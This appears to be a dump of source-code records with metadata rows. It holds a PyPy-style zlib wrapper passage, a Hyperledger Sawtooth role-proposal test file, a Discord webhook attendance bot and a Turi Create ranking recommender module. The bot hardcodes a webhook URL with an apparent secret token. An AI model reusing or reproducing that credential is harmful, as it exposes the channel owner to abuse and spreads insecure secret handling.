@unwrap_spec(data='bufferstr')
def compress(self, space, data):
"""
compress(data) -- Return a string containing data compressed.
After calling this function, some of the input data may still be stored
in internal buffers for later processing.
Call the flush() method to clear these buffers.
"""
try:
self.lock()
try:
if not self.stream:
raise zlib_error(space,
"compressor object already flushed")
result = rzlib.compress(self.stream, data)
finally:
self.unlock()
except rzlib.RZlibError as e:
raise zlib_error(space, e.msg)
return space.wrap(result)
@unwrap_spec(mode="c_int")
def flush(self, space, mode=rzlib.Z_FINISH):
"""
flush( [mode] ) -- Return a string containing any remaining compressed
data.
mode can be one of the constants Z_SYNC_FLUSH, Z_FULL_FLUSH, Z_FINISH;
the default value used when mode is not specified is Z_FINISH.
If mode == Z_FINISH, the compressor object can no longer be used after
calling the flush() method. Otherwise, more data can still be
compressed.
"""
try:
self.lock()
try:
if not self.stream:
raise zlib_error(space,
"compressor object already flushed")
result = rzlib.compress(self.stream, '', mode)
if mode == rzlib.Z_FINISH: # release the data structures now
rzlib.deflateEnd(self.stream)
self.stream = rzlib.null_stream
finally:
self.unlock()
except rzlib.RZlibError as e:
raise zlib_error(space, e.msg)
return space.wrap(result)
@unwrap_spec(level=int, method=int, wbits=int, memLevel=int, strategy=int)
def Compress___new__(space, w_subtype, level=rzlib.Z_DEFAULT_COMPRESSION,
method=rzlib.Z_DEFLATED, # \
wbits=rzlib.MAX_WBITS, # \ undocumented
memLevel=rzlib.DEF_MEM_LEVEL, # / parameters
strategy=rzlib.Z_DEFAULT_STRATEGY): # /
"""
Create a new z_stream and call its initializer.
"""
stream = space.allocate_instance(Compress, w_subtype)
stream = space.interp_w(Compress, stream)
Compress.__init__(stream, space, level,
method, wbits, memLevel, strategy)
return space.wrap(stream)
Compress.typedef = TypeDef(
'Compress',
__new__ = interp2app(Compress___new__),
compress = interp2app(Compress.compress),
flush = interp2app(Compress.flush),
__doc__ = """compressobj([level]) -- Return a compressor object.
Optional arg level is the compression level, in 1-9.
""")
class Decompress(ZLibObject):
"""
Wrapper around zlib's z_stream structure which provides convenient
decompression functionality.
"""
def __init__(self, space, wbits=rzlib.MAX_WBITS):
"""
Initialize a new decompression object.
wbits is an integer between 8 and MAX_WBITS or -8 and -MAX_WBITS
(inclusive) giving the number of "window bits" to use for compression
and decompression. See the documentation for deflateInit2 and
inflateInit2.
"""
ZLibObject.__init__(self, space)
self.unused_data = ''
self.unconsumed_tail = ''
try:
self.stream = rzlib.inflateInit(wbits)
except rzlib.RZlibError as e:
raise zlib_error(space, e.msg)
except ValueError:
raise oefmt(space.w_ValueError, "Invalid initialization option")
self.register_finalizer(space)
def _finalize_(self):
"""Automatically free the resources used by the stream."""
if self.stream:
rzlib.inflateEnd(self.stream)
self.stream = rzlib.null_stream
def _save_unconsumed_input(self, data, finished, unused_len):
unused_start = len(data) - unused_len
assert unused_start >= 0
tail = data[unused_start:]
if finished:
self.unconsumed_tail = ''
self.unused_data += tail
else:
self.unconsumed_tail = tail
@unwrap_spec(data='bufferstr', max_length="c_int")
def decompress(self, space, data, max_length=0):
"""
decompress(data[, max_length]) -- Return a string containing the
decompressed version of the data.
If the max_length parameter is specified then the return value will be
no longer than max_length. Unconsumed input data will be stored in the
unconsumed_tail attribute.
"""
if max_length == 0:
max_length = sys.maxint
elif max_length < 0:
raise oefmt(space.w_ValueError,
"max_length must be greater than zero")
try:
self.lock()
try:
result = rzlib.decompress(self.stream, data, max_length=max_length)
finally:
self.unlock()
except rzlib.RZlibError as e:
raise zlib_error(space, e.msg)
string, finished, unused_len = result
self._save_unconsumed_input(data, finished, unused_len)
return space.wrap(string)
def flush(self, space, w_length=None):
"""
flush( [length] ) -- This is kept for backward compatibility,
because each call to decompress() immediately returns as much
data as possible.
"""
if w_length is not None:
length = space.c_int_w(w_length)
if length <= 0:
raise oefmt(space.w_ValueError,
"length must be greater than zero")
data = self.unconsumed_tail
try:
self.lock()
try:
result = rzlib.decompress(self.stream, data, rzlib.Z_FINISH)
finally:
self.unlock()
except rzlib.RZlibError:
string = ""
else:
string, finished, unused_len = result
self._save_unconsumed_input(data, finished, unused_len)
return space.wrap(string)
@unwrap_spec(wbits=int)
def Decompress___new__(space, w_subtype, wbits=rzlib.MAX_WBITS):
"""
Create a new Decompress and call its initializer.
"""
stream = space.allocate_instance(Decompress, w_subtype)
stream = space.interp_w(Decompress, stream)
Decompress.__init__(stream, space, wbits)
return space.wrap(stream)
Decompress.typedef = TypeDef(
'Decompress',
__new__ = interp2app(Decompress___new__),
decompress = interp2app(Decompress.decompress),
flush = interp2app(Decompress.flush),
unused_data = interp_attrproperty('unused_data', Decompress),
unconsumed_tail = interp_attrproperty('unconsumed_tail', Decompress),
__doc__ = """decompressobj([wbits]) -- Return a decompressor object.
Optional arg wbits is the window buffer size.
""")
| 35.050562 | 83 | 0.626543 |
446457d16d65753f9acb5e516d09fa9367eeddf3 | 3,847 | py | Python | tests/rbac/common/role/propose_admin_tests.py | fthornton67/sawtooth-next-directory | 79479afb8d234911c56379bb1d8abf11f28ef86d | [
"Apache-2.0"
] | 75 | 2018-04-06T09:13:34.000Z | 2020-05-18T18:59:47.000Z | tests/rbac/common/role/propose_admin_tests.py | fthornton67/sawtooth-next-directory | 79479afb8d234911c56379bb1d8abf11f28ef86d | [
"Apache-2.0"
] | 989 | 2018-04-18T21:01:56.000Z | 2019-10-23T15:37:09.000Z | tests/rbac/common/role/propose_admin_tests.py | fthornton67/sawtooth-next-directory | 79479afb8d234911c56379bb1d8abf11f28ef86d | [
"Apache-2.0"
] | 72 | 2018-04-13T18:29:12.000Z | 2020-05-29T06:00:33.000Z | # Copyright 2019 Contributors to Hyperledger Sawtooth
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -----------------------------------------------------------------------------
"""Propose Role Add Admin Test"""
# pylint: disable=no-member
import pytest
from rbac.common import addresser
from rbac.common.role import Role
from rbac.common.user import User
from rbac.common import protobuf
from rbac.common.logs import get_default_logger
from tests.rbac.common import helper
LOGGER = get_default_logger(__name__)
@pytest.mark.role
@pytest.mark.library
def test_make():
"""Test making the message"""
next_id = helper.user.id()
role_id = helper.role.id()
proposal_id = addresser.proposal.unique_id()
reason = helper.proposal.reason()
message = Role().admin.propose.make(
proposal_id=proposal_id,
next_id=next_id,
role_id=role_id,
reason=reason,
metadata=None,
)
assert isinstance(message, protobuf.role_transaction_pb2.ProposeAddRoleAdmin)
assert message.proposal_id == proposal_id
assert message.next_id == next_id
assert message.role_id == role_id
assert message.reason == reason
@pytest.mark.role
@pytest.mark.library
def test_make_addresses():
"""Test making the message addresses"""
next_id = helper.user.id()
user_address = User().address(next_id)
role_id = helper.role.id()
role_address = Role().address(role_id)
proposal_id = addresser.proposal.unique_id()
reason = helper.proposal.reason()
relationship_address = Role().admin.address(role_id, next_id)
proposal_address = Role().admin.propose.address(role_id, next_id)
signer_user_id = helper.user.id()
message = Role().admin.propose.make(
proposal_id=proposal_id,
next_id=next_id,
role_id=role_id,
reason=reason,
metadata=None,
)
inputs, outputs = Role().admin.propose.make_addresses(
message=message, signer_user_id=signer_user_id
)
assert relationship_address in inputs
assert user_address in inputs
assert role_address in inputs
assert proposal_address in inputs
assert proposal_address in outputs
@pytest.mark.role
@pytest.mark.propose_role_admin
def test_create():
"""Test executing the message on the blockchain"""
role, _, _ = helper.role.create()
proposal_id = addresser.proposal.unique_id()
reason = helper.proposal.reason()
user, signer_keypair = helper.user.create()
message = Role().admin.propose.make(
proposal_id=proposal_id,
next_id=user.next_id,
role_id=role.role_id,
reason=reason,
metadata=None,
)
status = Role().admin.propose.new(
signer_keypair=signer_keypair, signer_user_id=user.next_id, message=message
)
assert len(status) == 1
assert status[0]["status"] == "COMMITTED"
proposal = Role().admin.propose.get(object_id=role.role_id, related_id=user.next_id)
assert isinstance(proposal, protobuf.proposal_state_pb2.Proposal)
    assert proposal.proposal_type == protobuf.proposal_state_pb2.Proposal.ADD_ROLE_ADMIN
assert proposal.proposal_id == proposal_id
assert proposal.object_id == role.role_id
assert proposal.related_id == user.next_id
assert proposal.opener == user.next_id
assert proposal.open_reason == reason
| 32.058333 | 88 | 0.706005 |
92d72026931063ce5b08b18abe6c3b3e04c42a13 | 2,429 | py | Python | AttendanceBot/discordbot.py | Aadityaprabu002/GoogleMeet_Attendance_Bot | 86aee5072d3c4035a051c51fe2c00e9c739e90af | [
"MIT"
] | 1 | 2021-11-28T17:43:39.000Z | 2021-11-28T17:43:39.000Z | AttendanceBot/discordbot.py | Aadityaprabu002/GoogleMeet_Attendance_Bot | 86aee5072d3c4035a051c51fe2c00e9c739e90af | [
"MIT"
] | null | null | null | AttendanceBot/discordbot.py | Aadityaprabu002/GoogleMeet_Attendance_Bot | 86aee5072d3c4035a051c51fe2c00e9c739e90af | [
"MIT"
] | null | null | null | from discord_webhook import DiscordWebhook
from discord_webhook import DiscordEmbed
URL = 'https://discord.com/api/webhooks/774702675114983466/ToCCEVBBr6R5deNpixqkSbIFM_Z_VAXeBDqP57c-iYumLVIiucrv9I4-BA-Dj8GqVoI2'
def send_start_details(SUBJECT,NAME):
webhook = DiscordWebhook(url = URL)
embed = DiscordEmbed(title ='CLASS DETAILS',color = 3800832,description='Class Successfully Started')
embed.add_embed_field(name='SUBJECT', value=NAME)
embed.add_embed_field(name='DATE', value=SUBJECT['date'])
embed.add_embed_field(name='DAY', value=SUBJECT['day'])
embed.add_embed_field(name='START TIME:', value=SUBJECT['start'])
embed.add_embed_field(name='LINK', value=SUBJECT['URL'])
webhook.add_embed(embed)
response = webhook.execute()
def send_end_details(SUBJECT,NAME):
webhook = DiscordWebhook(url=URL)
embed = DiscordEmbed(title='CLASS DETAILS', color=3801087, description='Class Successfully Ended')
embed.add_embed_field(name='SUBJECT', value=NAME.upper())
embed.add_embed_field(name='DATE', value=SUBJECT['date'])
embed.add_embed_field(name='DAY', value=SUBJECT['day'])
embed.add_embed_field(name='END TIME', value=SUBJECT['end'])
embed.add_embed_field(name='LINK', value=SUBJECT['URL'])
webhook.add_embed(embed)
response = webhook.execute()
def send_start_error_details(SUBJECT,NAME):
webhook = DiscordWebhook(url=URL)
embed = DiscordEmbed(title='CLASS DETAILS', color=3801087, description='ERROR JOINING CLASS!!!!')
embed.add_embed_field(name='SUBJECT', value=NAME.upper())
embed.add_embed_field(name='DATE', value=SUBJECT['date'])
embed.add_embed_field(name='DAY', value=SUBJECT['day'])
embed.add_embed_field(name='END TIME', value=SUBJECT['end'])
embed.add_embed_field(name='LINK', value=SUBJECT['URL'])
webhook.add_embed(embed)
response = webhook.execute()
def send_end_error_details(SUBJECT,NAME):
webhook = DiscordWebhook(url=URL)
embed = DiscordEmbed(title='CLASS DETAILS' , color=3801087, description='ERROR LEAVING CLASS!!!!')
embed.add_embed_field(name='SUBJECT', value=NAME)
embed.add_embed_field(name='DATE', value=SUBJECT['date'])
embed.add_embed_field(name='DAY', value=SUBJECT['day'])
embed.add_embed_field(name='END TIME:', value=SUBJECT['end'])
embed.add_embed_field(name='LINK', value=SUBJECT['URL'])
webhook.add_embed(embed)
response = webhook.execute()
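# Usage sketch with hypothetical values: the SUBJECT dict layout below is only
# inferred from the keys accessed above ('date', 'day', 'start', 'end', 'URL'),
# and running this block really posts two embeds to the configured webhook.
if __name__ == '__main__':
    sample_subject = {
        'date': '2021-01-01',
        'day': 'Friday',
        'start': '09:00',
        'end': '10:00',
        'URL': 'https://meet.google.com/abc-defg-hij',
    }
    send_start_details(sample_subject, 'MATHS')
    send_end_details(sample_subject, 'maths')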
| 44.981481 | 128 | 0.735282 |
3086520031a94358fd79da558b632ebb6cdec06c | 885 | py | Python | tests/clustering_system/corpus/test_FolderAggregatedBowNewsCorpora.py | vanam/clustering | 6e3d3ce7e60e31519b81547bc4afdf6ef3b0079f | [
"MIT"
] | 5 | 2019-05-28T15:45:46.000Z | 2020-10-05T17:48:27.000Z | tests/clustering_system/corpus/test_FolderAggregatedBowNewsCorpora.py | vanam/clustering | 6e3d3ce7e60e31519b81547bc4afdf6ef3b0079f | [
"MIT"
] | null | null | null | tests/clustering_system/corpus/test_FolderAggregatedBowNewsCorpora.py | vanam/clustering | 6e3d3ce7e60e31519b81547bc4afdf6ef3b0079f | [
"MIT"
] | 2 | 2019-07-16T14:13:19.000Z | 2020-11-23T01:53:44.000Z | import os
import tempfile
from gensim.corpora import Dictionary
from clustering_system.corpus.FolderAggregatedBowNewsCorpora import FolderAggregatedBowNewsCorpora
class TestFolderAggregatedBowNewsCorpora:
def test_create(self):
# Current directory
dir_path = os.path.dirname(os.path.realpath(__file__))
data_path = os.path.join(dir_path, "..", "data")
dictionary_file = os.path.join(dir_path, "data", "dictionary.dict")
dictionary = Dictionary.load(dictionary_file)
temp_dir = tempfile.TemporaryDirectory()
corpora = FolderAggregatedBowNewsCorpora(data_path, temp_dir.name, dictionary, language="en")
i = 0
for c in corpora:
i += 1
# Traverse corpus
for _ in c:
pass
# Assert number of times it went through the loop
assert i == 1
| 27.65625 | 101 | 0.662147 |
26a831742bba45b470c99fd19937852f548ebc95 | 25,611 | py | Python | src/unity/python/turicreate/toolkits/recommender/ranking_factorization_recommender.py | LeeCenY/turicreate | fb2f3bf313e831ceb42a2e10aacda6e472ea8d93 | [
"BSD-3-Clause"
] | null | null | null | src/unity/python/turicreate/toolkits/recommender/ranking_factorization_recommender.py | LeeCenY/turicreate | fb2f3bf313e831ceb42a2e10aacda6e472ea8d93 | [
"BSD-3-Clause"
] | null | null | null | src/unity/python/turicreate/toolkits/recommender/ranking_factorization_recommender.py | LeeCenY/turicreate | fb2f3bf313e831ceb42a2e10aacda6e472ea8d93 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright © 2017 Apple Inc. All rights reserved.
#
# Use of this source code is governed by a BSD-3-clause license that can
# be found in the LICENSE.txt file or at https://opensource.org/licenses/BSD-3-Clause
"""
Methods for performing doing matrix factorization and factorization machines
for making a ranking-based recommender. See
turicreate.recommender.ranking_factorization_recommender.create for additional documentation.
"""
from __future__ import print_function as _
from __future__ import division as _
from __future__ import absolute_import as _
import turicreate as _turicreate
from turicreate.toolkits.recommender.util import _Recommender
from turicreate.toolkits._model import _get_default_options_wrapper
def create(observation_data,
user_id='user_id', item_id='item_id', target=None,
user_data=None, item_data=None,
num_factors=32,
regularization=1e-9,
linear_regularization=1e-9,
side_data_factorization=True,
ranking_regularization=0.25,
unobserved_rating_value=None,
num_sampled_negative_examples=4,
max_iterations=25,
sgd_step_size=0,
random_seed=0,
binary_target = False,
solver = 'auto',
verbose=True,
**kwargs):
"""Create a RankingFactorizationRecommender that learns latent factors for each
user and item and uses them to make rating predictions.
Parameters
----------
observation_data : SFrame
The dataset to use for training the model. It must contain a column of
user ids and a column of item ids. Each row represents an observed
interaction between the user and the item. The (user, item) pairs
are stored with the model so that they can later be excluded from
recommendations if desired. It can optionally contain a target ratings
column. All other columns are interpreted by the underlying model as
side features for the observations.
The user id and item id columns must be of type 'int' or 'str'. The
target column must be of type 'int' or 'float'.
user_id : string, optional
The name of the column in `observation_data` that corresponds to the
user id.
item_id : string, optional
The name of the column in `observation_data` that corresponds to the
item id.
target : string, optional
The `observation_data` can optionally contain a column of scores
representing ratings given by the users. If present, the name of this
column may be specified variables `target`.
user_data : SFrame, optional
Side information for the users. This SFrame must have a column with
the same name as what is specified by the `user_id` input parameter.
`user_data` can provide any amount of additional user-specific
information.
item_data : SFrame, optional
Side information for the items. This SFrame must have a column with
the same name as what is specified by the `item_id` input parameter.
`item_data` can provide any amount of additional item-specific
information.
num_factors : int, optional
Number of latent factors.
regularization : float, optional
        L2 regularization for interaction terms. Default: 1e-9; a typical range
for this parameter is between 1e-12 and 1. Setting this to 0 may cause
numerical issues.
linear_regularization : float, optional
        L2 regularization for linear term. Default: 1e-9; a typical range for this
parameter is between 1e-12 and 1. Setting this to 0 may cause numerical issues.
side_data_factorization : boolean, optional
Use factorization for modeling any additional features beyond the user
and item columns. If True, and side features or any additional columns are
present, then a Factorization Machine model is trained. Otherwise, only
the linear terms are fit to these features. See
:class:`turicreate.recommender.ranking_factorization_recommender.RankingFactorizationRecommender`
for more information. Default: True.
ranking_regularization : float, optional
Penalize the predicted value of user-item pairs not in the
training set. Larger values increase this penalization.
Suggested values: 0, 0.1, 0.5, 1. NOTE: if no target column
is present, this parameter is ignored.
unobserved_rating_value : float, optional
Penalize unobserved items with a larger predicted score than this value.
By default, the estimated 5% quantile is used (mean - 1.96*std_dev).
num_sampled_negative_examples : integer, optional
For each (user, item) pair in the data, the ranking sgd solver evaluates
this many randomly chosen unseen items for the negative example step.
Increasing this can give better performance at the expense of speed,
particularly when the number of items is large. Default is 4.
binary_target : boolean, optional
Assume the target column is composed of 0's and 1's. If True, use
logistic loss to fit the model.
max_iterations : int, optional
The training algorithm will make at most this many iterations through
        the observed data. Default: 25.
sgd_step_size : float, optional
Step size for stochastic gradient descent. Smaller values generally
lead to more accurate models that take more time to train. The
default setting of 0 means that the step size is chosen by trying
several options on a small subset of the data.
random_seed : int, optional
The random seed used to choose the initial starting point for
model training. Note that some randomness in the training is
unavoidable, so models trained with the same random seed may still
differ. Default: 0.
solver : string, optional
Name of the solver to be used to solve the regression. See the
references for more detail on each solver. The available solvers for
this model are:
- *auto (default)*: automatically chooses the best solver for the data
and model parameters.
- *ials*: Implicit Alternating Least Squares [1].
- *adagrad*: Adaptive Gradient Stochastic Gradient Descent.
- *sgd*: Stochastic Gradient Descent
verbose : bool, optional
Enables verbose output.
kwargs : optional
Optional advanced keyword arguments passed in to the model
optimization procedure. These parameters do not typically
need to be changed.
Examples
--------
**Basic usage**
When given just user and item pairs, one can create a RankingFactorizationRecommender
as follows.
>>> sf = turicreate.SFrame({'user_id': ["0", "0", "0", "1", "1", "2", "2", "2"],
    ...                        'item_id': ["a", "b", "c", "a", "b", "b", "c", "d"]})
>>> from turicreate.recommender import ranking_factorization_recommender
>>> m1 = ranking_factorization_recommender.create(sf)
When a target column is present, one can include this to try and recommend
items that are rated highly.
>>> sf = turicreate.SFrame({'user_id': ["0", "0", "0", "1", "1", "2", "2", "2"],
... 'item_id': ["a", "b", "c", "a", "b", "b", "c", "d"],
... 'rating': [1, 3, 2, 5, 4, 1, 4, 3]})
>>> m1 = ranking_factorization_recommender.create(sf, target='rating')
**Including side features**
>>> user_info = turicreate.SFrame({'user_id': ["0", "1", "2"],
... 'name': ["Alice", "Bob", "Charlie"],
... 'numeric_feature': [0.1, 12, 22]})
>>> item_info = turicreate.SFrame({'item_id': ["a", "b", "c", "d"],
... 'name': ["item1", "item2", "item3", "item4"],
... 'dict_feature': [{'a' : 23}, {'a' : 13},
... {'b' : 1},
... {'a' : 23, 'b' : 32}]})
>>> m2 = ranking_factorization_recommender.create(sf, target='rating',
... user_data=user_info,
... item_data=item_info)
**Customizing ranking regularization**
Create a model that pushes predicted ratings of unobserved user-item
pairs toward 1 or below.
>>> m3 = ranking_factorization_recommender.create(sf, target='rating',
... ranking_regularization = 0.1,
... unobserved_rating_value = 1)
**Using the implicit alternating least squares model**
Ranking factorization also implements implicit alternating least squares [1] as
an alternative solver. This is enable using ``solver = 'ials'``.
>>> m3 = ranking_factorization_recommender.create(sf, target='rating',
solver = 'ials')
See Also
--------
:class:`turicreate.recommender.factorization_recommender.FactorizationRecommender`,
:class:`turicreate.recommender.ranking_factorization_recommender.RankingFactorizationRecommender`
References
-----------
[1] Collaborative Filtering for Implicit Feedback Datasets Hu, Y.; Koren,
Y.; Volinsky, C. IEEE International Conference on Data Mining
(ICDM 2008), IEEE (2008).
"""
from turicreate._cython.cy_server import QuietProgress
opts = {}
model_proxy = _turicreate.extensions.ranking_factorization_recommender()
model_proxy.init_options(opts)
if user_data is None:
user_data = _turicreate.SFrame()
if item_data is None:
item_data = _turicreate.SFrame()
nearest_items = _turicreate.SFrame()
if target is None:
binary_target = True
opts = {'user_id' : user_id,
'item_id' : item_id,
'target' : target,
'random_seed' : random_seed,
'num_factors' : num_factors,
'regularization' : regularization,
'linear_regularization' : linear_regularization,
'ranking_regularization' : ranking_regularization,
'binary_target' : binary_target,
'max_iterations' : max_iterations,
'side_data_factorization' : side_data_factorization,
'num_sampled_negative_examples' : num_sampled_negative_examples,
'solver' : solver,
# Has no effect here.
'sgd_step_size' : sgd_step_size}
if unobserved_rating_value is not None:
opts["unobserved_rating_value"] = unobserved_rating_value
if kwargs:
try:
possible_args = set(_get_default_options()["name"])
except (RuntimeError, KeyError):
possible_args = set()
bad_arguments = set(kwargs.keys()).difference(possible_args)
if bad_arguments:
raise TypeError("Bad Keyword Arguments: " + ', '.join(bad_arguments))
opts.update(kwargs)
extra_data = {"nearest_items" : _turicreate.SFrame()}
with QuietProgress(verbose):
model_proxy.train(observation_data, user_data, item_data, opts, extra_data)
return RankingFactorizationRecommender(model_proxy)
_get_default_options = _get_default_options_wrapper(
'ranking_factorization_recommender',
'recommender.RankingFactorizationRecommender',
'RankingFactorizationRecommender')
class RankingFactorizationRecommender(_Recommender):
r"""
A RankingFactorizationRecommender learns latent factors for each
user and item and uses them to rank recommended items according to
the likelihood of observing those (user, item) pairs. This is
commonly desired when performing collaborative filtering for
implicit feedback datasets or datasets with explicit ratings
for which ranking prediction is desired.
RankingFactorizationRecommender contains a number of options that
tailor to a variety of datasets and evaluation metrics, making
this one of the most powerful models in the Turi Create
recommender toolkit.
**Creating a RankingFactorizationRecommender**
This model cannot be constructed directly. Instead, use
:func:`turicreate.recommender.ranking_factorization_recommender.create`
to create an instance
of this model. A detailed list of parameter options and code samples
are available in the documentation for the create function.
**Side information**
Side features may be provided via the `user_data` and `item_data` options
when the model is created.
Additionally, observation-specific information, such as the time of day when
the user rated the item, can also be included. Any column in the
`observation_data` SFrame that is not the user id, item id, or target is
treated as a observation side features. The same side feature columns must
be present when calling :meth:`predict`.
Side features may be numeric or categorical. User ids and item ids are
treated as categorical variables. For the additional side features, the type
of the :class:`~turicreate.SFrame` column determines how it's handled: strings
are treated as categorical variables and integers and floats are treated as
numeric variables. Dictionaries and numeric arrays are also supported.
**Optimizing for ranking performance**
By default, RankingFactorizationRecommender optimizes for the
precision-recall performance of recommendations.
**Model parameters**
Trained model parameters may be accessed using
`m.get('coefficients')` or equivalently `m['coefficients']`, where `m`
is a RankingFactorizationRecommender.
See Also
--------
create, :func:`turicreate.recommender.factorization_recommender.create`
Notes
-----
**Model Details**
`RankingFactorizationRecommender` trains a model capable of predicting a score for
each possible combination of users and items. The internal coefficients of
the model are learned from known scores of users and items.
Recommendations are then based on these scores.
In the two factorization models, users and items are represented by weights
and factors. These model coefficients are learned during training.
Roughly speaking, the weights, or bias terms, account for a user or item's
bias towards higher or lower ratings. For example, an item that is
consistently rated highly would have a higher weight coefficient associated
with them. Similarly, an item that consistently receives below average
ratings would have a lower weight coefficient to account for this bias.
The factor terms model interactions between users and items. For example,
if a user tends to love romance movies and hate action movies, the factor
terms attempt to capture that, causing the model to predict lower scores
for action movies and higher scores for romance movies. Learning good
weights and factors is controlled by several options outlined below.
More formally, the predicted score for user :math:`i` on item :math:`j` is
given by
.. math::
\operatorname{score}(i, j) =
\mu + w_i + w_j
+ \mathbf{a}^T \mathbf{x}_i + \mathbf{b}^T \mathbf{y}_j
+ {\mathbf u}_i^T {\mathbf v}_j,
where :math:`\mu` is a global bias term, :math:`w_i` is the weight term for
user :math:`i`, :math:`w_j` is the weight term for item :math:`j`,
:math:`\mathbf{x}_i` and :math:`\mathbf{y}_j` are respectively the user and
item side feature vectors, and :math:`\mathbf{a}` and :math:`\mathbf{b}`
are respectively the weight vectors for those side features.
The latent factors, which are vectors of length ``num_factors``, are given
by :math:`{\mathbf u}_i` and :math:`{\mathbf v}_j`.
**Training the model**
The model is trained using Stochastic Gradient Descent with additional
tricks to improve convergence. The optimization is done in parallel
over multiple threads. This procedure is inherently random, so different
calls to `create()` may return slightly different models, even with the
same `random_seed`.
In the explicit rating case, the objective function we are
optimizing for is:
.. math::
\min_{\mathbf{w}, \mathbf{a}, \mathbf{b}, \mathbf{V}, \mathbf{U}}
\frac{1}{|\mathcal{D}|} \sum_{(i,j,r_{ij}) \in \mathcal{D}}
\mathcal{L}(\operatorname{score}(i, j), r_{ij})
+ \lambda_1 (\lVert {\mathbf w} \rVert^2_2 + || {\mathbf a} ||^2_2 + || {\mathbf b} ||^2_2 )
+ \lambda_2 \left(\lVert {\mathbf U} \rVert^2_2
+ \lVert {\mathbf V} \rVert^2_2 \right)
where :math:`\mathcal{D}` is the observation dataset, :math:`r_{ij}` is the
rating that user :math:`i` gave to item :math:`j`,
:math:`{\mathbf U} = ({\mathbf u}_1, {\mathbf u}_2, ...)` denotes the user's
latent factors and :math:`{\mathbf V} = ({\mathbf v}_1, {\mathbf v}_2, ...)`
denotes the item latent factors. The loss function
:math:`\mathcal{L}(\hat{y}, y)` is :math:`(\hat{y} - y)^2` by default.
:math:`\lambda_1` denotes the `linear_regularization` parameter and
:math:`\lambda_2` the `regularization` parameter.
When ``ranking_regularization`` is nonzero, then the equation
above gets an additional term. Let :math:`\lambda_{\text{rr}}` represent
the value of `ranking_regularization`, and let
:math:`v_{\text{ur}}` represent `unobserved_rating_value`. Then the
objective we attempt to minimize is:
.. math::
\min_{\mathbf{w}, \mathbf{a}, \mathbf{b}, \mathbf{V}, \mathbf{U}}
\frac{1}{|\mathcal{D}|} \sum_{(i,j,r_{ij}) \in \mathcal{D}}
\mathcal{L}(\operatorname{score}(i, j), r_{ij})
+ \lambda_1 (\lVert {\mathbf w} \rVert^2_2 + || {\mathbf a} ||^2_2 + || {\mathbf b} ||^2_2 )
+ \lambda_2 \left(\lVert {\mathbf U} \rVert^2_2
+ \lVert {\mathbf V} \rVert^2_2 \right) \\
+ \frac{\lambda_{rr}}{\text{const} * |\mathcal{U}|}
\sum_{(i,j) \in \mathcal{U}}
\mathcal{L}\left(\operatorname{score}(i, j), v_{\text{ur}}\right),
where :math:`\mathcal{U}` is a sample of unobserved user-item pairs.
In the implicit case when there are no target values, we use
logistic loss to fit a model that attempts to predict all the
given (user, item) pairs in the training data as 1 and all others
as 0. To train this model, we sample an unobserved item along
with each observed (user, item) pair, using SGD to push the score
of the observed pair towards 1 and the unobserved pair towards 0.
In this case, the `ranking_regularization` parameter is ignored.
When `binary_targets=True`, then the target values must be 0 or 1;
in this case, we also use logistic loss to train the model so the
predicted scores are as close to the target values as possible.
This time, the rating of the sampled unobserved pair is set to 0
(thus the `unobserved_rating_value` is ignored). In this case,
the loss on the unobserved pairs is weighted by
`ranking_regularization` as in the non-binary case.
To choose the unobserved pair complementing a given observation,
the algorithm selects several (defaults to four) candidate
negative items that the user in the given observation has not
rated. The algorithm scores each one using the current model, then
chooses the item with the largest predicted score. This adaptive
sampling strategy provides faster convergence than just sampling a
single negative item.
The Factorization Machine is a generalization of Matrix
Factorization. Like matrix factorization, it predicts target
rating values as a weighted combination of user and item latent
factors, biases, side features, and their pairwise combinations.
In particular, while Matrix Factorization learns latent factors
for only the user and item interactions, the Factorization Machine
learns latent factors for all variables, including side features,
and also allows for interactions between all pairs of
variables. Thus the Factorization Machine is capable of modeling
complex relationships in the data. Typically, using
`linear_side_features=True` performs better in terms of RMSE, but
may require a longer training time.
num_sampled_negative_examples: For each (user, item) pair in the data, the
ranking sgd solver evaluates this many randomly chosen unseen items for the
negative example step. Increasing this can give better performance at the
expense of speed, particularly when the number of items is large.
When `ranking_regularization` is larger than zero, the model samples
a small set of unobserved user-item pairs and attempts to drive their rating
predictions below the value specified with `unobserved_rating_value`.
This has the effect of improving the precision-recall performance of
recommended items.
    **Implicit Matrix Factorization**
    `RankingFactorizationRecommender` has an additional option of optimizing
for ranking using the implicit matrix factorization model. The internal coefficients of
the model and its interpretation are identical to the model described above.
The difference between the two models is in the nature in which the objective
is achieved. Currently, this model does not incorporate any columns
beyond user/item (and rating) or side data.
The model works by transferring the raw observations (or weights) (r) into
two separate magnitudes with distinct interpretations: preferences (p) and
confidence levels (c). The functional relationship between the weights (r)
and the confidence is either linear or logarithmic which can be toggled
by setting `ials_confidence_scaling_type` = `linear` (the default) or `log`
respectively. The rate of increase of the confidence with respect to the
weights is proportional to the `ials_confidence_scaling_factor`
(default 1.0).
Examples
--------
**Basic usage**
>>> sf = turicreate.SFrame({'user_id': ["0", "0", "0", "1", "1", "2", "2", "2"],
... 'item_id': ["a", "b", "c", "a", "b", "b", "c", "d"],
... 'rating': [1, 3, 2, 5, 4, 1, 4, 3]})
>>> m1 = turicreate.ranking_factorization_recommender.create(sf, target='rating')
For implicit data, no target column is specified:
>>> sf = turicreate.SFrame({'user': ["0", "0", "0", "1", "1", "2", "2", "2"],
... 'movie': ["a", "b", "c", "a", "b", "b", "c", "d"]})
>>> m2 = turicreate.ranking_factorization_recommender.create(sf, 'user', 'movie')
**Implicit Matrix Factorization**
>>> sf = turicreate.SFrame({'user_id': ["0", "0", "0", "1", "1", "2", "2", "2"],
... 'item_id': ["a", "b", "c", "a", "b", "b", "c", "d"],
... 'rating': [1, 3, 2, 5, 4, 1, 4, 3]})
>>> m1 = turicreate.ranking_factorization_recommender.create(sf, target='rating',
solver='ials')
For implicit data, no target column is specified:
>>> sf = turicreate.SFrame({'user': ["0", "0", "0", "1", "1", "2", "2", "2"],
... 'movie': ["a", "b", "c", "a", "b", "b", "c", "d"]})
>>> m2 = turicreate.ranking_factorization_recommender.create(sf, 'user', 'movie',
solver='ials')
**Including side features**
